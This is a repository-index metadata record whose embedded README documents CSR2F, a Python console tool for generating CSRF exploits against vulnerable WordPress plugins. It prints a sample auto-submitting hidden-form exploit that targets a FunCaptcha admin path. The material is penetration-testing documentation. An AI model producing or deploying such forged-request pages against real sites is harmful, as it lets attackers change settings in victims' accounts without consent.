{"id":18451592,"url":"https://github.com/ncrocfer/csr2f","last_synced_at":"2025-04-08T02:32:34.311Z","repository":{"id":146146767,"uuid":"10621100","full_name":"ncrocfer/csr2f","owner":"ncrocfer","description":"CSR2F is a Python tool used for generating CSRF (Cross-Site Request Forgery) exploits","archived":false,"fork":false,"pushed_at":"2019-08-22T17:41:17.000Z","size":470,"stargazers_count":13,"open_issues_count":3,"forks_count":9,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-23T04:23:38.367Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"http://ncrocfer.github.io/csr2f/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ncrocfer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-06-11T12:36:30.000Z","updated_at":"2023-04-14T12:03:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"7a536b92-7fba-478b-a123-bcd0bfb26563","html_url":"https://github.com/ncrocfer/csr2f","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ncrocfer","download_url":"https://codeload.github.com/ncrocfer/csr2f/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247764804,"owners_count":20992177,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T07:29:10.973Z","updated_at":"2025-04-08T02:32:34.304Z","avatar_url":"https://github.com/ncrocfer.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"CSR2F\n=====\n\nCSR2F (Cross-Site Request Forgery Framework) is an open source tool written in Python and used for generating CSRF (Cross-Site Request Forgery) exploits.\nIt allows you to search an exploit for a specific case (for example a vulnerable WordPress plugin), then to configure and generate the HTML code.\n\n\nPrerequisites\n----\n\n* CSR2F uses [Python 3](http://www.python.org/download/) to run.\n\n\nInstallation\n----\n\nYou can download the latest tarball by clicking [here](https://github.com/ncrocfer/csr2f/tarball/master) or latest zipball by clicking [here](https://github.com/ncrocfer/csr2f/zipball/master).\n\nPreferably, you can download CSR2F by cloning the [Git](https://github.com/ncrocfer/csr2f) repository:\n\n git clone https://github.com/ncrocfer/csr2f.git\n\n\nUsage\n----\n\nYou must execute the `csr2f.py` file to start CSR2F and obtain a prompt:\n\n shatter@shatter:~/csr2f$ python3 csr2f.py\n\n *********************************************************\n * *\n * ______ ______ _______ _____ ________ *\n * .' ___ |.' ____ \\ |_ __ \\ / ___ `.|_ __ | *\n * / .' \\_|| (___ \\_| | |__) | |_/___) | | |_ \\_| *\n * | | _.____`. | __ / .'____.' | _| *\n * \\ `.___.'\\| \\____) | _| | \\ \\_ / /_____ _| |_ *\n * `.____ .' \\______.'|____| |___||_______||_____| *\n * *\n * Cross Site Request Forgery Framework *\n * *\n * Version : 0.1b *\n * Author : Nicolas Crocfer *\n * Website : http://csr2f.github.com *\n * Licence : GPLv3 *\n * *\n *********************************************************\n\n [+] 207 exploits loaded\n\n csr2f\u003e \n\n\n**help**\n\nThis command describes the other commands and shows their usage.\n\n csr2f\u003e help\n\n Commands\tDescription\n ========\t===========\n\n config \tDisplay the configuration options\n clear \tClear the current screen\n search \tSearch an exploit based on keyword\n show \tDisplay informations about an exploit based on its ID\n set \tSet special fields for an exploit\n generate\tGenerate the exploit to the console or in a file\n ...\t\t\t...\n\n csr2f\u003e help config\n\n This command is used to view and modify the basic configuration. You\n can view it by typing 'config' without argument.\n\n Usage:\tconfig \u003citem\u003e \u003cvalue\u003e\n Ex:\tconfig host_url http://www.example.com\n\n csr2f\u003e\n\n\n**config**\n\nThis command is used to view and modify the basic configuration.\n\n csr2f\u003e config\n\n Config\t\t\tValue\n ======\t\t\t=====\n \n host_url\t\thttp://www.example.com\n redirect\t\tFalse\n html_skeleton\tTrue\n html_title\t\tCSR2F : Cross Site Request Forgery Framework\n redirect_url\thttp://www.example.com\n\n csr2f\u003e config redirect True\n [+] The value has been modified\n csr2f\u003e\n\n\n**search**\n\nYou can search an exploit based on keywords by using the `search` command.\n\n csr2f\u003e search wordpress plugin\n\n Date ID Method Name Description\n ==== == ====== ==== ===========\n \n 2013-04-11 112 POST Wordpress FunCaptcha plug... A CSRF vulnerability allows to disable...\n 2013-03-25 134 POST Wordpress Mathjax Latex P... There is no CSRF protection on the mat...\n 2013-03-01 175 POST WordPress SolveMedia 1.1.0 SolveMedia is a capatcha service that ...\n ... ... ... ... ...\n\n csr2f\u003e\n\n\n**show**\n\nThis command is used to show the informations about an exploit (author, description, configuration...). \n\n csr2f\u003e show 112\n\n Informations\n ============\n\n Name : Wordpress FunCaptcha plugin 0.3.2\n ----\n \n Description\n -----------\n A CSRF vulnerability allows to disable the plugin by submitting an invalid private or public key.\n \n Author : Nicolas Crocfer (https://github.com/ncrocfer)\n ------\n \n Method \u0026 Path : (POST) /wp-admin/plugins.php?page=funcaptcha/wp_funcaptcha.php\n -------------\n\n Configuration\n =============\n\n \tfuncaptcha[public_key] =\u003e foo\n \t----------------------\n \tValue of the new public key\n\n \tfuncaptcha[private_key] =\u003e bar\n -----------------------\n Value of the new private key\n\n csr2f\u003e\n\n\n**set**\n\nEach exploit can contain special fields that you can edit (for example a username, a password, an email adress...). This command is used to\tchange these values.\n\n csr2f\u003e set 112 funcaptcha[public_key] 1234\n [+] The value has been modified\n csr2f\u003e\n\n**generate**\n\nThis command is used to generate the HTML exploit. You can display it on the screen by typing `generate \u003cid\u003e` without other argument. You can also pass a filename to create a new file.\n\n csr2f\u003e generate 112\n\n \u003c!DOCTYPE html\u003e\n \u003chtml\u003e\n \u003chead\u003e\n \u003cmeta charset=\"utf-8\"/\u003e\n \u003ctitle\u003e\n CSR2F : Cross Site Request Forgery Framework\n \u003c/title\u003e\n \u003c/head\u003e\n \u003cbody\u003e\n \u003cform action=\"http://www.example.com/wp-admin/plugins.php?page=funcaptcha/wp_funcaptcha.php\" id=\"csr2f\" method=\"post\"\u003e\n \u003cinput name=\"funcaptcha[public_key]\" type=\"hidden\" value=\"foo\"/\u003e\n \u003cinput name=\"funcaptcha[private_key]\" type=\"hidden\" value=\"bar\"/\u003e\n \u003cinput name=\"funcaptcha[action]\" type=\"hidden\" value=\"settings\"/\u003e\n \u003cinput name=\"funcaptcha[type]\" type=\"hidden\" value=\"Settings\"/\u003e\n \u003c/form\u003e\n \u003cscript type=\"text/javascript\"\u003e\n document.getElementById(\"csr2f\").submit();\n \u003c/script\u003e\n \u003c/body\u003e\n \u003c/html\u003e\n\n csrf2\u003e generate 112 index.html\n [+] The file was created in 'output' folder\n csrf2\u003e\n\n\n**Other commands**\n\n* `clear` : Clear the user screen\n* `update` : Update the exploits list\n* `exit` : Exit the console\n\n\nCreating a new exploit\n----\n\nFor the time being, CSR2F does not include a lot of exploits. I am currently incorporating the ones already online on [exploit-db.com](http://www.exploit-db.com/search/?action=search\u0026filter_description=csrf).\n\nBut the goal of this framework is to be the reference for CSRF vulnerabilities : so I encourage you to integrate your exploit to this tool when you discover a new vulnerability, and thereby increase the list with your contributions.\n\nCSR2F uses a simple template for integrating new exploits. Each exploit is located in the `exploits` folder. For the moment this tool is still in Beta version, so I am waiting the return of beta testers to see if I need to add or modify the template system and then update this documentation. Anyway you can view the existing templates and tell me what do you think about.\n\n\nOh, one last thing\n----\n\nI'm a French developer, my English is not perfect and I thank you in advance to tell me my mistakes :)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fncrocfer%2Fcsr2f","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fncrocfer%2Fcsr2f","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fncrocfer%2Fcsr2f/lists"}